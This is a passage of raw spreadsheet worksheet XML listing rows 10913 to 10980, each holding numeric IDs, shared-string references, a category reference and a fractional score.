        <v>7374</v>
      </c>
      <c r="F10913" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="10914" ht="15.75" customHeight="1">
      <c r="A10914" s="1">
        <v>17364.0</v>
      </c>
      <c r="B10914" s="2">
        <v>4.9493811E7</v>
      </c>
      <c r="C10914" s="2" t="s">
        <v>10456</v>
      </c>
      <c r="D10914" s="2">
        <v>1.0</v>
      </c>
      <c r="E10914" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10914" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="10915" ht="15.75" customHeight="1">
      <c r="A10915" s="1">
        <v>8387.0</v>
      </c>
      <c r="B10915" s="2">
        <v>5.3826696E7</v>
      </c>
      <c r="C10915" s="2" t="s">
        <v>10457</v>
      </c>
      <c r="D10915" s="2">
        <v>1.0</v>
      </c>
      <c r="E10915" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10915" s="2">
        <v>0.09454191033138402</v>
      </c>
    </row>
    <row r="10916" ht="15.75" customHeight="1">
      <c r="A10916" s="1">
        <v>1304.0</v>
      </c>
      <c r="B10916" s="2">
        <v>2.5695633E7</v>
      </c>
      <c r="C10916" s="2" t="s">
        <v>10458</v>
      </c>
      <c r="D10916" s="2">
        <v>1.0</v>
      </c>
      <c r="E10916" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10916" s="2">
        <v>0.09424603174603176</v>
      </c>
    </row>
    <row r="10917" ht="15.75" customHeight="1">
      <c r="A10917" s="1">
        <v>15066.0</v>
      </c>
      <c r="B10917" s="2">
        <v>4.1711903E7</v>
      </c>
      <c r="C10917" s="2" t="s">
        <v>10459</v>
      </c>
      <c r="D10917" s="2">
        <v>1.0</v>
      </c>
      <c r="E10917" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10917" s="2">
        <v>0.09424603174603176</v>
      </c>
    </row>
    <row r="10918" ht="15.75" customHeight="1">
      <c r="A10918" s="1">
        <v>14699.0</v>
      </c>
      <c r="B10918" s="2">
        <v>4.0579423E7</v>
      </c>
      <c r="C10918" s="2" t="s">
        <v>10460</v>
      </c>
      <c r="D10918" s="2">
        <v>1.0</v>
      </c>
      <c r="E10918" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10918" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="10919" ht="15.75" customHeight="1">
      <c r="A10919" s="1">
        <v>1314.0</v>
      </c>
      <c r="B10919" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C10919" s="2" t="s">
        <v>10461</v>
      </c>
      <c r="D10919" s="2">
        <v>1.0</v>
      </c>
      <c r="E10919" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10919" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="10920" ht="15.75" customHeight="1">
      <c r="A10920" s="1">
        <v>12156.0</v>
      </c>
      <c r="B10920" s="2">
        <v>2.7303417E7</v>
      </c>
      <c r="C10920" s="2" t="s">
        <v>10462</v>
      </c>
      <c r="D10920" s="2">
        <v>1.0</v>
      </c>
      <c r="E10920" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10920" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="10921" ht="15.75" customHeight="1">
      <c r="A10921" s="1">
        <v>18201.0</v>
      </c>
      <c r="B10921" s="2">
        <v>5.2049938E7</v>
      </c>
      <c r="C10921" s="2" t="s">
        <v>10463</v>
      </c>
      <c r="D10921" s="2">
        <v>1.0</v>
      </c>
      <c r="E10921" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10921" s="2">
        <v>0.09424603174603172</v>
      </c>
    </row>
    <row r="10922" ht="15.75" customHeight="1">
      <c r="A10922" s="1">
        <v>10668.0</v>
      </c>
      <c r="B10922" s="2">
        <v>1.4412129E7</v>
      </c>
      <c r="C10922" s="2" t="s">
        <v>10464</v>
      </c>
      <c r="D10922" s="2">
        <v>1.0</v>
      </c>
      <c r="E10922" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10922" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="10923" ht="15.75" customHeight="1">
      <c r="A10923" s="1">
        <v>1551.0</v>
      </c>
      <c r="B10923" s="2">
        <v>2.7595019E7</v>
      </c>
      <c r="C10923" s="2" t="s">
        <v>10465</v>
      </c>
      <c r="D10923" s="2">
        <v>1.0</v>
      </c>
      <c r="E10923" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10923" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="10924" ht="15.75" customHeight="1">
      <c r="A10924" s="1">
        <v>2138.0</v>
      </c>
      <c r="B10924" s="2">
        <v>3.1562289E7</v>
      </c>
      <c r="C10924" s="2" t="s">
        <v>10466</v>
      </c>
      <c r="D10924" s="2">
        <v>1.0</v>
      </c>
      <c r="E10924" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10924" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="10925" ht="15.75" customHeight="1">
      <c r="A10925" s="1">
        <v>15757.0</v>
      </c>
      <c r="B10925" s="2">
        <v>4.4145193E7</v>
      </c>
      <c r="C10925" s="2" t="s">
        <v>10467</v>
      </c>
      <c r="D10925" s="2">
        <v>1.0</v>
      </c>
      <c r="E10925" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10925" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="10926" ht="15.75" customHeight="1">
      <c r="A10926" s="1">
        <v>15794.0</v>
      </c>
      <c r="B10926" s="2">
        <v>4.4209713E7</v>
      </c>
      <c r="C10926" s="2" t="s">
        <v>10467</v>
      </c>
      <c r="D10926" s="2">
        <v>1.0</v>
      </c>
      <c r="E10926" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10926" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="10927" ht="15.75" customHeight="1">
      <c r="A10927" s="1">
        <v>17455.0</v>
      </c>
      <c r="B10927" s="2">
        <v>4.9843593E7</v>
      </c>
      <c r="C10927" s="2" t="s">
        <v>10468</v>
      </c>
      <c r="D10927" s="2">
        <v>1.0</v>
      </c>
      <c r="E10927" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10927" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="10928" ht="15.75" customHeight="1">
      <c r="A10928" s="1">
        <v>20608.0</v>
      </c>
      <c r="B10928" s="2">
        <v>1.3934359E7</v>
      </c>
      <c r="C10928" s="2" t="s">
        <v>10469</v>
      </c>
      <c r="D10928" s="2">
        <v>1.0</v>
      </c>
      <c r="E10928" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10928" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="10929" ht="15.75" customHeight="1">
      <c r="A10929" s="1">
        <v>20660.0</v>
      </c>
      <c r="B10929" s="2">
        <v>1.4301733E7</v>
      </c>
      <c r="C10929" s="2" t="s">
        <v>10470</v>
      </c>
      <c r="D10929" s="2">
        <v>1.0</v>
      </c>
      <c r="E10929" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10929" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="10930" ht="15.75" customHeight="1">
      <c r="A10930" s="1">
        <v>32195.0</v>
      </c>
      <c r="B10930" s="2">
        <v>5.4746733E7</v>
      </c>
      <c r="C10930" s="2" t="s">
        <v>10471</v>
      </c>
      <c r="D10930" s="2">
        <v>1.0</v>
      </c>
      <c r="E10930" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10930" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="10931" ht="15.75" customHeight="1">
      <c r="A10931" s="1">
        <v>4142.0</v>
      </c>
      <c r="B10931" s="2">
        <v>4.1409314E7</v>
      </c>
      <c r="C10931" s="2" t="s">
        <v>10472</v>
      </c>
      <c r="D10931" s="2">
        <v>1.0</v>
      </c>
      <c r="E10931" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10931" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="10932" ht="15.75" customHeight="1">
      <c r="A10932" s="1">
        <v>17594.0</v>
      </c>
      <c r="B10932" s="2">
        <v>5.0317337E7</v>
      </c>
      <c r="C10932" s="2" t="s">
        <v>10473</v>
      </c>
      <c r="D10932" s="2">
        <v>1.0</v>
      </c>
      <c r="E10932" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10932" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="10933" ht="15.75" customHeight="1">
      <c r="A10933" s="1">
        <v>21212.0</v>
      </c>
      <c r="B10933" s="2">
        <v>1.957962E7</v>
      </c>
      <c r="C10933" s="2" t="s">
        <v>10474</v>
      </c>
      <c r="D10933" s="2">
        <v>1.0</v>
      </c>
      <c r="E10933" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10933" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="10934" ht="15.75" customHeight="1">
      <c r="A10934" s="1">
        <v>10924.0</v>
      </c>
      <c r="B10934" s="2">
        <v>1.6822964E7</v>
      </c>
      <c r="C10934" s="2" t="s">
        <v>10475</v>
      </c>
      <c r="D10934" s="2">
        <v>1.0</v>
      </c>
      <c r="E10934" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10934" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="10935" ht="15.75" customHeight="1">
      <c r="A10935" s="1">
        <v>15206.0</v>
      </c>
      <c r="B10935" s="2">
        <v>4.2109347E7</v>
      </c>
      <c r="C10935" s="2" t="s">
        <v>10476</v>
      </c>
      <c r="D10935" s="2">
        <v>1.0</v>
      </c>
      <c r="E10935" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10935" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="10936" ht="15.75" customHeight="1">
      <c r="A10936" s="1">
        <v>22472.0</v>
      </c>
      <c r="B10936" s="2">
        <v>3679364.0</v>
      </c>
      <c r="C10936" s="2" t="s">
        <v>10477</v>
      </c>
      <c r="D10936" s="2">
        <v>1.0</v>
      </c>
      <c r="E10936" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10936" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="10937" ht="15.75" customHeight="1">
      <c r="A10937" s="1">
        <v>19069.0</v>
      </c>
      <c r="B10937" s="2">
        <v>5.4608824E7</v>
      </c>
      <c r="C10937" s="2" t="s">
        <v>10478</v>
      </c>
      <c r="D10937" s="2">
        <v>1.0</v>
      </c>
      <c r="E10937" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10937" s="2">
        <v>0.09099616858237548</v>
      </c>
    </row>
    <row r="10938" ht="15.75" customHeight="1">
      <c r="A10938" s="1">
        <v>18240.0</v>
      </c>
      <c r="B10938" s="2">
        <v>5.2140068E7</v>
      </c>
      <c r="C10938" s="2" t="s">
        <v>10479</v>
      </c>
      <c r="D10938" s="2">
        <v>1.0</v>
      </c>
      <c r="E10938" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10938" s="2">
        <v>0.7433333333333334</v>
      </c>
    </row>
    <row r="10939" ht="15.75" customHeight="1">
      <c r="A10939" s="1">
        <v>10185.0</v>
      </c>
      <c r="B10939" s="2">
        <v>5.7385089E7</v>
      </c>
      <c r="C10939" s="2" t="s">
        <v>10481</v>
      </c>
      <c r="D10939" s="2">
        <v>1.0</v>
      </c>
      <c r="E10939" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10939" s="2">
        <v>0.6408908908908909</v>
      </c>
    </row>
    <row r="10940" ht="15.75" customHeight="1">
      <c r="A10940" s="1">
        <v>7302.0</v>
      </c>
      <c r="B10940" s="2">
        <v>5.0837609E7</v>
      </c>
      <c r="C10940" s="2" t="s">
        <v>10482</v>
      </c>
      <c r="D10940" s="2">
        <v>1.0</v>
      </c>
      <c r="E10940" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10940" s="2">
        <v>0.5582010582010581</v>
      </c>
    </row>
    <row r="10941" ht="15.75" customHeight="1">
      <c r="A10941" s="1">
        <v>7326.0</v>
      </c>
      <c r="B10941" s="2">
        <v>5.0896759E7</v>
      </c>
      <c r="C10941" s="2" t="s">
        <v>10483</v>
      </c>
      <c r="D10941" s="2">
        <v>1.0</v>
      </c>
      <c r="E10941" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10941" s="2">
        <v>0.4761284722222222</v>
      </c>
    </row>
    <row r="10942" ht="15.75" customHeight="1">
      <c r="A10942" s="1">
        <v>4389.0</v>
      </c>
      <c r="B10942" s="2">
        <v>4.2216357E7</v>
      </c>
      <c r="C10942" s="2" t="s">
        <v>10484</v>
      </c>
      <c r="D10942" s="2">
        <v>1.0</v>
      </c>
      <c r="E10942" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10942" s="2">
        <v>0.4611928104575164</v>
      </c>
    </row>
    <row r="10943" ht="15.75" customHeight="1">
      <c r="A10943" s="1">
        <v>8787.0</v>
      </c>
      <c r="B10943" s="2">
        <v>5.4591414E7</v>
      </c>
      <c r="C10943" s="2" t="s">
        <v>10485</v>
      </c>
      <c r="D10943" s="2">
        <v>1.0</v>
      </c>
      <c r="E10943" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10943" s="2">
        <v>0.3713768115942029</v>
      </c>
    </row>
    <row r="10944" ht="15.75" customHeight="1">
      <c r="A10944" s="1">
        <v>19076.0</v>
      </c>
      <c r="B10944" s="2">
        <v>5.4634109E7</v>
      </c>
      <c r="C10944" s="2" t="s">
        <v>10486</v>
      </c>
      <c r="D10944" s="2">
        <v>1.0</v>
      </c>
      <c r="E10944" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10944" s="2">
        <v>0.3456072351421188</v>
      </c>
    </row>
    <row r="10945" ht="15.75" customHeight="1">
      <c r="A10945" s="1">
        <v>6967.0</v>
      </c>
      <c r="B10945" s="2">
        <v>4.998173E7</v>
      </c>
      <c r="C10945" s="2" t="s">
        <v>10487</v>
      </c>
      <c r="D10945" s="2">
        <v>1.0</v>
      </c>
      <c r="E10945" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10945" s="2">
        <v>0.3240740740740741</v>
      </c>
    </row>
    <row r="10946" ht="15.75" customHeight="1">
      <c r="A10946" s="1">
        <v>7127.0</v>
      </c>
      <c r="B10946" s="2">
        <v>5.0420678E7</v>
      </c>
      <c r="C10946" s="2" t="s">
        <v>10488</v>
      </c>
      <c r="D10946" s="2">
        <v>1.0</v>
      </c>
      <c r="E10946" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10946" s="2">
        <v>0.3231611893583725</v>
      </c>
    </row>
    <row r="10947" ht="15.75" customHeight="1">
      <c r="A10947" s="1">
        <v>14006.0</v>
      </c>
      <c r="B10947" s="2">
        <v>3.7391814E7</v>
      </c>
      <c r="C10947" s="2" t="s">
        <v>10489</v>
      </c>
      <c r="D10947" s="2">
        <v>1.0</v>
      </c>
      <c r="E10947" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10947" s="2">
        <v>0.3179824561403509</v>
      </c>
    </row>
    <row r="10948" ht="15.75" customHeight="1">
      <c r="A10948" s="1">
        <v>6038.0</v>
      </c>
      <c r="B10948" s="2">
        <v>4.7585616E7</v>
      </c>
      <c r="C10948" s="2" t="s">
        <v>10490</v>
      </c>
      <c r="D10948" s="2">
        <v>1.0</v>
      </c>
      <c r="E10948" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10948" s="2">
        <v>0.3150252525252525</v>
      </c>
    </row>
    <row r="10949" ht="15.75" customHeight="1">
      <c r="A10949" s="1">
        <v>16718.0</v>
      </c>
      <c r="B10949" s="2">
        <v>4.7461393E7</v>
      </c>
      <c r="C10949" s="2" t="s">
        <v>10491</v>
      </c>
      <c r="D10949" s="2">
        <v>1.0</v>
      </c>
      <c r="E10949" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10949" s="2">
        <v>0.3109668109668109</v>
      </c>
    </row>
    <row r="10950" ht="15.75" customHeight="1">
      <c r="A10950" s="1">
        <v>10179.0</v>
      </c>
      <c r="B10950" s="2">
        <v>5.7385089E7</v>
      </c>
      <c r="C10950" s="2" t="s">
        <v>10492</v>
      </c>
      <c r="D10950" s="2">
        <v>1.0</v>
      </c>
      <c r="E10950" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10950" s="2">
        <v>0.3066847335140018</v>
      </c>
    </row>
    <row r="10951" ht="15.75" customHeight="1">
      <c r="A10951" s="1">
        <v>17903.0</v>
      </c>
      <c r="B10951" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C10951" s="2" t="s">
        <v>10493</v>
      </c>
      <c r="D10951" s="2">
        <v>1.0</v>
      </c>
      <c r="E10951" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10951" s="2">
        <v>0.2991967871485943</v>
      </c>
    </row>
    <row r="10952" ht="15.75" customHeight="1">
      <c r="A10952" s="1">
        <v>29467.0</v>
      </c>
      <c r="B10952" s="2">
        <v>3.2349615E7</v>
      </c>
      <c r="C10952" s="2" t="s">
        <v>10494</v>
      </c>
      <c r="D10952" s="2">
        <v>1.0</v>
      </c>
      <c r="E10952" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10952" s="2">
        <v>0.2947089947089947</v>
      </c>
    </row>
    <row r="10953" ht="15.75" customHeight="1">
      <c r="A10953" s="1">
        <v>4093.0</v>
      </c>
      <c r="B10953" s="2">
        <v>4.1257335E7</v>
      </c>
      <c r="C10953" s="2" t="s">
        <v>10495</v>
      </c>
      <c r="D10953" s="2">
        <v>1.0</v>
      </c>
      <c r="E10953" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10953" s="2">
        <v>0.2946623093681917</v>
      </c>
    </row>
    <row r="10954" ht="15.75" customHeight="1">
      <c r="A10954" s="1">
        <v>5746.0</v>
      </c>
      <c r="B10954" s="2">
        <v>4.6642459E7</v>
      </c>
      <c r="C10954" s="2" t="s">
        <v>10496</v>
      </c>
      <c r="D10954" s="2">
        <v>1.0</v>
      </c>
      <c r="E10954" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10954" s="2">
        <v>0.2928669410150891</v>
      </c>
    </row>
    <row r="10955" ht="15.75" customHeight="1">
      <c r="A10955" s="1">
        <v>9717.0</v>
      </c>
      <c r="B10955" s="2">
        <v>5.640143E7</v>
      </c>
      <c r="C10955" s="2" t="s">
        <v>10497</v>
      </c>
      <c r="D10955" s="2">
        <v>1.0</v>
      </c>
      <c r="E10955" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10955" s="2">
        <v>0.2895833333333333</v>
      </c>
    </row>
    <row r="10956" ht="15.75" customHeight="1">
      <c r="A10956" s="1">
        <v>16964.0</v>
      </c>
      <c r="B10956" s="2">
        <v>4.8257385E7</v>
      </c>
      <c r="C10956" s="2" t="s">
        <v>10498</v>
      </c>
      <c r="D10956" s="2">
        <v>1.0</v>
      </c>
      <c r="E10956" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10956" s="2">
        <v>0.2862654320987655</v>
      </c>
    </row>
    <row r="10957" ht="15.75" customHeight="1">
      <c r="A10957" s="1">
        <v>7005.0</v>
      </c>
      <c r="B10957" s="2">
        <v>5.0089912E7</v>
      </c>
      <c r="C10957" s="2" t="s">
        <v>10499</v>
      </c>
      <c r="D10957" s="2">
        <v>1.0</v>
      </c>
      <c r="E10957" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10957" s="2">
        <v>0.2814465408805031</v>
      </c>
    </row>
    <row r="10958" ht="15.75" customHeight="1">
      <c r="A10958" s="1">
        <v>9308.0</v>
      </c>
      <c r="B10958" s="2">
        <v>5.5572599E7</v>
      </c>
      <c r="C10958" s="2" t="s">
        <v>10500</v>
      </c>
      <c r="D10958" s="2">
        <v>1.0</v>
      </c>
      <c r="E10958" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10958" s="2">
        <v>0.2794741306191687</v>
      </c>
    </row>
    <row r="10959" ht="15.75" customHeight="1">
      <c r="A10959" s="1">
        <v>3180.0</v>
      </c>
      <c r="B10959" s="2">
        <v>3.7100561E7</v>
      </c>
      <c r="C10959" s="2" t="s">
        <v>10501</v>
      </c>
      <c r="D10959" s="2">
        <v>1.0</v>
      </c>
      <c r="E10959" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10959" s="2">
        <v>0.2791164658634538</v>
      </c>
    </row>
    <row r="10960" ht="15.75" customHeight="1">
      <c r="A10960" s="1">
        <v>5253.0</v>
      </c>
      <c r="B10960" s="2">
        <v>4.5094431E7</v>
      </c>
      <c r="C10960" s="2" t="s">
        <v>10502</v>
      </c>
      <c r="D10960" s="2">
        <v>1.0</v>
      </c>
      <c r="E10960" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10960" s="2">
        <v>0.2791164658634537</v>
      </c>
    </row>
    <row r="10961" ht="15.75" customHeight="1">
      <c r="A10961" s="1">
        <v>17659.0</v>
      </c>
      <c r="B10961" s="2">
        <v>5.0441437E7</v>
      </c>
      <c r="C10961" s="2" t="s">
        <v>10503</v>
      </c>
      <c r="D10961" s="2">
        <v>1.0</v>
      </c>
      <c r="E10961" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10961" s="2">
        <v>0.2749648382559775</v>
      </c>
    </row>
    <row r="10962" ht="15.75" customHeight="1">
      <c r="A10962" s="1">
        <v>6869.0</v>
      </c>
      <c r="B10962" s="2">
        <v>4.9682879E7</v>
      </c>
      <c r="C10962" s="2" t="s">
        <v>10504</v>
      </c>
      <c r="D10962" s="2">
        <v>1.0</v>
      </c>
      <c r="E10962" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10962" s="2">
        <v>0.2729700854700854</v>
      </c>
    </row>
    <row r="10963" ht="15.75" customHeight="1">
      <c r="A10963" s="1">
        <v>8962.0</v>
      </c>
      <c r="B10963" s="2">
        <v>5.4924984E7</v>
      </c>
      <c r="C10963" s="2" t="s">
        <v>10505</v>
      </c>
      <c r="D10963" s="2">
        <v>1.0</v>
      </c>
      <c r="E10963" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10963" s="2">
        <v>0.2718780727630285</v>
      </c>
    </row>
    <row r="10964" ht="15.75" customHeight="1">
      <c r="A10964" s="1">
        <v>6961.0</v>
      </c>
      <c r="B10964" s="2">
        <v>4.9979785E7</v>
      </c>
      <c r="C10964" s="2" t="s">
        <v>10506</v>
      </c>
      <c r="D10964" s="2">
        <v>1.0</v>
      </c>
      <c r="E10964" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10964" s="2">
        <v>0.2713920817369093</v>
      </c>
    </row>
    <row r="10965" ht="15.75" customHeight="1">
      <c r="A10965" s="1">
        <v>7221.0</v>
      </c>
      <c r="B10965" s="2">
        <v>5.0642815E7</v>
      </c>
      <c r="C10965" s="2" t="s">
        <v>10507</v>
      </c>
      <c r="D10965" s="2">
        <v>1.0</v>
      </c>
      <c r="E10965" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10965" s="2">
        <v>0.26994301994302</v>
      </c>
    </row>
    <row r="10966" ht="15.75" customHeight="1">
      <c r="A10966" s="1">
        <v>7618.0</v>
      </c>
      <c r="B10966" s="2">
        <v>5.1711853E7</v>
      </c>
      <c r="C10966" s="2" t="s">
        <v>10508</v>
      </c>
      <c r="D10966" s="2">
        <v>1.0</v>
      </c>
      <c r="E10966" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10966" s="2">
        <v>0.2670940170940171</v>
      </c>
    </row>
    <row r="10967" ht="15.75" customHeight="1">
      <c r="A10967" s="1">
        <v>2635.0</v>
      </c>
      <c r="B10967" s="2">
        <v>3.4594757E7</v>
      </c>
      <c r="C10967" s="2" t="s">
        <v>10509</v>
      </c>
      <c r="D10967" s="2">
        <v>1.0</v>
      </c>
      <c r="E10967" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10967" s="2">
        <v>0.2667824074074074</v>
      </c>
    </row>
    <row r="10968" ht="15.75" customHeight="1">
      <c r="A10968" s="1">
        <v>19549.0</v>
      </c>
      <c r="B10968" s="2">
        <v>5.6056003E7</v>
      </c>
      <c r="C10968" s="2" t="s">
        <v>10510</v>
      </c>
      <c r="D10968" s="2">
        <v>1.0</v>
      </c>
      <c r="E10968" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10968" s="2">
        <v>0.2634548611111111</v>
      </c>
    </row>
    <row r="10969" ht="15.75" customHeight="1">
      <c r="A10969" s="1">
        <v>2616.0</v>
      </c>
      <c r="B10969" s="2">
        <v>3.4472335E7</v>
      </c>
      <c r="C10969" s="2" t="s">
        <v>10511</v>
      </c>
      <c r="D10969" s="2">
        <v>1.0</v>
      </c>
      <c r="E10969" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10969" s="2">
        <v>0.2589984350547732</v>
      </c>
    </row>
    <row r="10970" ht="15.75" customHeight="1">
      <c r="A10970" s="1">
        <v>13226.0</v>
      </c>
      <c r="B10970" s="2">
        <v>3.4229909E7</v>
      </c>
      <c r="C10970" s="2" t="s">
        <v>10512</v>
      </c>
      <c r="D10970" s="2">
        <v>1.0</v>
      </c>
      <c r="E10970" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10970" s="2">
        <v>0.257201646090535</v>
      </c>
    </row>
    <row r="10971" ht="15.75" customHeight="1">
      <c r="A10971" s="1">
        <v>13217.0</v>
      </c>
      <c r="B10971" s="2">
        <v>3.4200816E7</v>
      </c>
      <c r="C10971" s="4" t="s">
        <v>10513</v>
      </c>
      <c r="D10971" s="2">
        <v>1.0</v>
      </c>
      <c r="E10971" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10971" s="2">
        <v>0.2571225071225071</v>
      </c>
    </row>
    <row r="10972" ht="15.75" customHeight="1">
      <c r="A10972" s="1">
        <v>9837.0</v>
      </c>
      <c r="B10972" s="2">
        <v>5.6647243E7</v>
      </c>
      <c r="C10972" s="2" t="s">
        <v>10514</v>
      </c>
      <c r="D10972" s="2">
        <v>1.0</v>
      </c>
      <c r="E10972" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10972" s="2">
        <v>0.2534013605442176</v>
      </c>
    </row>
    <row r="10973" ht="15.75" customHeight="1">
      <c r="A10973" s="1">
        <v>10181.0</v>
      </c>
      <c r="B10973" s="2">
        <v>5.7385089E7</v>
      </c>
      <c r="C10973" s="2" t="s">
        <v>10515</v>
      </c>
      <c r="D10973" s="2">
        <v>1.0</v>
      </c>
      <c r="E10973" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10973" s="2">
        <v>0.252234993614304</v>
      </c>
    </row>
    <row r="10974" ht="15.75" customHeight="1">
      <c r="A10974" s="1">
        <v>4966.0</v>
      </c>
      <c r="B10974" s="2">
        <v>4.4082053E7</v>
      </c>
      <c r="C10974" s="2" t="s">
        <v>10516</v>
      </c>
      <c r="D10974" s="2">
        <v>1.0</v>
      </c>
      <c r="E10974" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10974" s="2">
        <v>0.2508090614886731</v>
      </c>
    </row>
    <row r="10975" ht="15.75" customHeight="1">
      <c r="A10975" s="1">
        <v>33655.0</v>
      </c>
      <c r="B10975" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C10975" s="2" t="s">
        <v>10517</v>
      </c>
      <c r="D10975" s="2">
        <v>1.0</v>
      </c>
      <c r="E10975" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10975" s="2">
        <v>0.2474747474747475</v>
      </c>
    </row>
    <row r="10976" ht="15.75" customHeight="1">
      <c r="A10976" s="1">
        <v>2159.0</v>
      </c>
      <c r="B10976" s="2">
        <v>3.1742245E7</v>
      </c>
      <c r="C10976" s="2" t="s">
        <v>10518</v>
      </c>
      <c r="D10976" s="2">
        <v>1.0</v>
      </c>
      <c r="E10976" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10976" s="2">
        <v>0.2437908496732026</v>
      </c>
    </row>
    <row r="10977" ht="15.75" customHeight="1">
      <c r="A10977" s="1">
        <v>19459.0</v>
      </c>
      <c r="B10977" s="2">
        <v>5.5760689E7</v>
      </c>
      <c r="C10977" s="2" t="s">
        <v>10519</v>
      </c>
      <c r="D10977" s="2">
        <v>1.0</v>
      </c>
      <c r="E10977" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10977" s="2">
        <v>0.2436507936507937</v>
      </c>
    </row>
    <row r="10978" ht="15.75" customHeight="1">
      <c r="A10978" s="1">
        <v>8398.0</v>
      </c>
      <c r="B10978" s="2">
        <v>5.3856019E7</v>
      </c>
      <c r="C10978" s="2" t="s">
        <v>10520</v>
      </c>
      <c r="D10978" s="2">
        <v>1.0</v>
      </c>
      <c r="E10978" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10978" s="2">
        <v>0.2415824915824916</v>
      </c>
    </row>
    <row r="10979" ht="15.75" customHeight="1">
      <c r="A10979" s="1">
        <v>1123.0</v>
      </c>
      <c r="B10979" s="2">
        <v>2.4159867E7</v>
      </c>
      <c r="C10979" s="2" t="s">
        <v>10521</v>
      </c>
      <c r="D10979" s="2">
        <v>1.0</v>
      </c>
      <c r="E10979" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10979" s="2">
        <v>0.240530303030303</v>
      </c>
    </row>
    <row r="10980" ht="15.75" customHeight="1">
      <c r="A10980" s="1">
        <v>9684.0</v>
      </c>
      <c r="B10980" s="2">
        <v>5.6333126E7</v>
      </c>
      <c r="C10980" s="2" t="s">
        <v>10522</v>
      </c>
      <c r="D10980" s="2">
        <v>1.0</v>
      </c>
      <c r="E10980" s="3" t="s">
